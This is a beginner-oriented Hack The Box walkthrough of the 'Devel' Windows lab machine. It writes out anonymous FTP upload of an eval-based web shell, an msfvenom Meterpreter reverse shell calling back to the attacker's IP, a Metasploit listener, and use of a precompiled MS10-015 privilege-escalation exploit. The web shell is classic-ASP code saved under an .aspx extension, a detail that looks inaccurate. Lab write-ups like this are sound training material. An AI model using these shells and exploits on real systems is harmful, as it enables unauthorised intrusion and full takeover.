Difficulty: Easy
OS: Windows
Points: 20
Author: Hack The Box
Writeup by: Nikita
🧠 Introduction
In this walkthrough, we’ll explore Hack The Box and exploit the Devel machine from Hack The Box. This is one of the most beginner-friendly Windows boxes, making it perfect for those starting out with penetration testing.
Let’s get hacking! 💻
🔎 Step 1: Reconnaissance
Start with a full Nmap scan to discover open ports and services.
nmap -T4 -A -n 10.10.10.5
🔍 Nmap Output:
- FTP (21) is open with anonymous login allowed.
- HTTP (80) runs Microsoft IIS 7.5.
Let’s explore them one by one.
📁 Step 2: Anonymous FTP Access
Connect to FTP using anonymous credentials:
ftp 10.10.10.5
Login with:
Name: anonymous
Password: [anything]
Once logged in, you’ll see a writable directory with a folder called aspnet_client.
Try uploading a simple file:
put test.txt
✅ Upload succeeds! We can upload arbitrary files to the web root.
🕸️ Step 3: Gaining Web Shell Access
The IIS server is likely serving files from the FTP-upload directory. Let’s confirm this by uploading an ASP web shell.
🛠️ Generate an ASP web shell:
You can use a simple one-liner:
<%eval request("cmd")%>
Save it as p1.aspx.
echo "<%eval request(\"cmd\")%>" > p1.aspx
Upload the shell via FTP:
put p1.aspx
Now, access it via browser:
http://10.10.10.5/p1.aspx?cmd=whoami
🎉 Success! You should see something like:
iis apppool\web
🚀 Step 4: Getting a Reverse Shell
Now let’s upgrade our shell to a more interactive one using a reverse shell payload.
🔧 Generate Reverse Shell (MSFVenom):
msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=4444 -f asp > revshell.aspx
Replace YOUR_IP with your VPN IP.
Upload the revshell.aspxfile via FTP:
put revshell.aspx
Start a listener on your system:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST YOUR_IP
set LPORT 4444
run
Then visit:
http://10.10.10.5/revshell.aspx
💥 You’ll get a Meterpreter shell!
🔐 Step 5: Privilege Escalation
🔎 Basic Enumeration
In Meterpreter, get a standard shell:
shell
Check user context:
whoami
You’ll see:
iis apppool\web
Let’s check the OS version:
systeminfo
Look for the following in the output:
OS Name: Microsoft Windows 7 ...
Hotfix(s): [None]
No hotfixes? That’s a red flag. 🔥
Let’s check for public exploits.
🧨 Step 6: Exploiting Vulnerability (MS10-015 / MS11-046)
We can use MS11-046 or MS10-015 (KiTrap0D) for privilege escalation on Windows 7.
To make it easy, let’s use Windows Exploit Suggester.
Download and run it with the systeminfo output:
./windows-exploit-suggester.py --database 2023-XX-XX-mssb.csv --systeminfo systeminfo.txt
It suggests MS10-015 as a valid exploit.
You can use a precompiled executable from trusted sources (e.g., compiled exploits repo).
⚠️ Always test exploits in safe environments. Do not run random .exes on your host.
Upload the exploit via FTP or Meterpreter.
Run it on the target and get SYSTEM access!
🧾 Step 7: Capture the Flags
Once you have SYSTEM access, grab the flags!
User flag:
cd C:\Users\Public\Desktop
type user.txt
Root flag:
cd C:\Users\Administrator\Desktop
type root.txt
🔥 Done!
🧠 Final Thoughts
Devel is a great beginner-friendly box that teaches:
- FTP misconfigurations
- IIS hosting quirks
- Simple reverse shell payloads
- Basic Windows privilege escalation
📌 Key Takeaways
- Always check for anonymous FTP + HTTP combinations.
- Test file uploads for shell access.
- Use
msfvenomfor quick reverse shells. - Learn how to spot unpatched systems for escalation.
If you found this helpful, follow me on Medium and visit hackingwit.com for more write-ups like this!
Happy Hacking! 🧑💻